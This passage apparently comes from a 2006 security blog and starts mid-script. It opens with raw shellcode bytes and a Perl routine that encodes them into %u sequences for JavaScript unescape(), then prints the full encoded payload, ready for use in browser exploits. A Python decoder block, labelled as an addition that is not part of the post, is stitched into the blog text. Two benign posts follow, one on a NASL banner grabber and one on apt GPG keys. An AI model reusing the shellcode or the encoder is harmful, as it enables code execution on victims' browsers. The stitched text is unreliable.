"\x7e\x3c\x79\xc0\x66\x24\x9e\xd2\x66\x4c\x90\x93\x36\xba\x30\xd2".
"\x65\x4c\xbe\xd2\xd2\x12\x90\xaf\x76\xc9\xd4\xbd\x92\xc0\x42\x21".
"\x2c\x0e\x26\x45\x4d\x3c\x22\xfb\x34\x1c\x28\x89\xa8\xb5\xa6\xff".
"\xbc\xb1\x0c\x62\x15\x3b\x20\x27\x2c\xc3\x4d\xf9\x80\x69\x7d\x2f".
"\xf6\x38\xf7\x94\x8d\x17\x5e\x22\x80\x0b\x86\x23\x4f\x0d\xb9\x26".
"\x2f\x6c\x29\x36\x2f\x7c\x29\x89\x2a\x10\xf0\xb1\x4e\xe7\x2a\x25".
"\x17\x3e\x79\x67\x23\xb5\x99\x1c\x6f\x6c\x2e\x89\x2a\x18\x2a\x21".
"\x80\x69\x51\x25\x2b\x6b\x86\x23\x5f\xb5\xbe\xf7\x93\x3c\x69\x76".
"\x7f\xb5\x9a\x1c\x7f\x54\x79\x66\x7f\x3c\x2a\x21\x80\x69\x61\xf7".
"\x93\x3c\x7d\x76\x7f\xc3\xaa\x76";


JSUnescape($shellcode);


sub JSUnescape #Taken from Mozilla_Compareto by Aviv Raff and H D Moore
{
my $data = shift;
my $code = '';

# Encode the shellcode via %u sequences for JS's unescape() function
my $idx = 0;
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
$idx += 2;
}

print "\n" . $code . "\n";
}


Output should look like the following. All ready for unescape()!


%uc92b%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u7f13%u793c%u8376%ufceb%uf4e2%u6a97%u7679%u6f7f%u202c%ub728%u5215%ub767%u4a3c%u68f4%u0e7c%ud67e%u3cf2%ub767%u5623%ud77e%u449a%ub736%ufd4d%ud27e%u8948%u0d83%udab9%udc47%u710d%uf3be%u7774%ud7b8%u4d8b%u1803%u036d%ub79e%u5223%ud77e%ufd1f%u7773%u2cf2%u3d63%ufd92%ub77b%u9e78%u3e94%ub648%u6220%u2d24%u34bd%u2879%u0c15%u1220%u25f4%u2df2%ub773%u6a22%u27f4%u2df2%u6f77%uf811%u3231%u8995%ub5a9%uf7be%u3c93%u7678%u6b7f%u252f%ud9f6%u5191%u3c7f%ue679%u3c7e%uc079%u2466%ud29e%u4c66%u9390%uba36%ud230%u4c65%ud2be%u12d2%uaf90%uc976%ubdd4%uc092%u2142%u0e2c%u4526%u3c4d%ufb22%u1c34%u8928%ub5a8%uffa6%ub1bc%u620c%u3b15%u2720%uc32c%uf94d%u6980%u2f7d%u38f6%u94f7%u178d%u225e%u0b80%u2386%u0d4f%u26b9%u6c2f%u3629%u7c2f%u8929%u102a%ub1f0%ue74e%u252a%u3e17%u6779%ub523%u1c99%u6c6f%u892e%u182a%u212a%u6980%u2551%u6b2b%u2386%ub55f%uf7be%u3c93%u7669%ub57f%u1c9a%u547f%u6679%u3c7f%u212a%u6980%uf761%u3c93%u767d%uc37f%u76aa
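An added example for the analyst side, not part of the post's script: decoding %uXXXX strings (the form found in obfuscated pages) back into bytes, checked against the first units of the output above, with a Python twin of the Perl encoder so the byte swap is visible from both directions. Function names are mine.

```python
import re

# One escape unit: %uXXXX (a 16-bit code unit) or %XX (one byte)
_UNIT = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')

def js_unescape_bytes(encoded):
    """Turn a string meant for JavaScript's unescape() back into raw bytes.

    Each %uXXXX becomes the 16-bit value XXXX stored low byte first, which is
    why the Perl routine above emits the second byte of every pair before the
    first; %XX becomes a single byte. Decoding stops at the first character
    that is not part of an escape. Returns (bytes, stop) where stop is None
    if the whole input decoded, else the index of the offending character."""
    out = bytearray()
    pos = 0
    for m in _UNIT.finditer(encoded):
        if m.start() != pos:              # literal text between escapes
            return bytes(out), pos
        if m.group(1) is not None:
            unit = int(m.group(1), 16)
            out += bytes([unit & 0xff, unit >> 8])
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    return bytes(out), (None if pos == len(encoded) else pos)

def js_escape_units(data):
    """Python twin of the Perl JSUnescape(): pair up bytes as %u<b2><b1>.
    Like the Perl loop it drops a trailing odd byte, so pad first if needed."""
    return ''.join('%%u%02x%02x' % (data[i + 1], data[i])
                   for i in range(0, len(data) - 1, 2))

# First units of the post's output, constructed here as the sample input
SAMPLE = '%uc92b%ue983%ud9b8%ud9ee'

if __name__ == '__main__':
    raw, stop = js_unescape_bytes(SAMPLE)
    print(raw.hex(), stop)   # 2bc983e9b8d9eed9 None
```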

Wednesday, January 11, 2006

webserv-naslgrab.nasl

Well I wanted to get a bit more familiar with NASL (Nessus Attack Scripting Language). I've modified nessus plugins in the past but never really did much with it. I have to say I do like it, pretty easy to do testing with.

I needed a way to check a lot of webservers for their versions, and fast. So figured what the heck let me throw something together with NASL. Now this is just a stand-alone script, it will not work within the nessus framework.
(More docs to work with nessus framework are below)

This just sends a HEAD request to the webserver and greps for the server string.

This also could be easily modified to read from the socket and grab other banners. I found this would work for telnet, ftp, ssh, etc. but for some reason I could not grab the banner from the webservers I was testing. Hence sending
"HEAD / HTTP/1.0\r\n\r\n"

If you wanted to read right from the socket without sending the HEAD command you could just comment that out and replace name w/ server.

I will be looking into this more, but this was just a quick script to get my feet wet.


#####################################################################
# Name: webserv-naslgrab.nasl                                       #
# Description: A non-intrusive way to grab the web server version   #
#              by opening a socket to 80 and sending a              #
#              HEAD Request. This can be modified to use other      #
#              ports.                                               #
# Version: .1                                                       #
# Author : Devin Ertel                                              #
# Usage : nasl -t 192.168.1-155 webserv-naslgrab.nasl               #
#####################################################################

#Create tcp socket to port 80
soc = open_sock_tcp(80);

#grab host ip of current box with socket open
hostip=get_host_ip();

#if socket was created
if (soc) {

#create string and send
str = string("HEAD / HTTP/1.0\r\n\r\n");
send(socket:soc, data:str);

#grab data from the socket
name = recv(socket:soc, length:1024);

#grep for the line with server in it
server = egrep(pattern:"Server.*", string : name);

#if grep returns value
if(server){
display(server," On IP ",hostip,"\n");
}

#close socket
close(soc);
}


Links:
http://michel.arboi.free.fr/nasl2ref/
http://www.oreillynet.com/pub/a/security/2004/06/03/nessus_plugins.html
http://www.virtualblueness.net/nasl.html

Saturday, January 7, 2006

GPG Signature Checking w/ Debian And Apt 0.6

In new versions of apt, GPG signature checking is enabled by default. This is a good thing, allowing us to trust the packages we are installing on our system. But if you recently upgraded apt it will begin to complain about not being able to find the pubkey. It should look something like this.

W: GPG error: http://mirrors.kernel.org testing Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 010908312D230C5F

Now I just recently got sick of seeing this message and decided I should really get this working for security reasons. That being said I am a bit new to this. There are many documents out there on how to get this working, I am just documenting different things I did and found. Hopefully once I fully understand the process I will clean this up.

First, you will need to have a 0.6 version of apt and gnupg installed.

Once you have that an easy way to try and fix this problem is install the debian-keyring.

apt-get install debian-keyring


Now we can import the key using apt-key.


apt-key add /usr/share/keyrings/debian-keyring.gpg
apt-key add /usr/share/keyrings/debian-role-keys.gpg


Now I am really not sure what the difference is between them.
This fixed my message of NO_PUBKEY for ftp.nerim.net.
If you don't have this in your sources.list and it's a desktop, I really would add this, a lot of video and media type debs that debian does not carry. Link below:
http://debian.video.free.fr

OK, back to business. apt is still complaining about my kernel.org mirror.
I read somewhere that a new key will be added every year on the year. Somehow I did not have that new key from the debian-keyring package. So let's go get it.


wget http://ftp-master.debian.org/ziyi_key_year.asc


Now I just added it with apt-key but you could just do it with gpg.


gpg --import ziyi_key_2006.asc

or

apt-key add ziyi_key_2006.asc



Now apt-get update and it should be fixed. Like I said earlier, I'm a little unclear about this whole process. I would have thought downloading the whole debian-keyring would have done it. It is even overkill because I really only needed a couple of keys.

Links:
http://www.debian-administration.org/articles/174
http://secure-testing-master.debian.net/
http://lists.debian.org/debian-user/2005/11/msg00064.html
http://moonbase.rydia.net/mental/blog/life/mixing-ubuntu-and-debian.html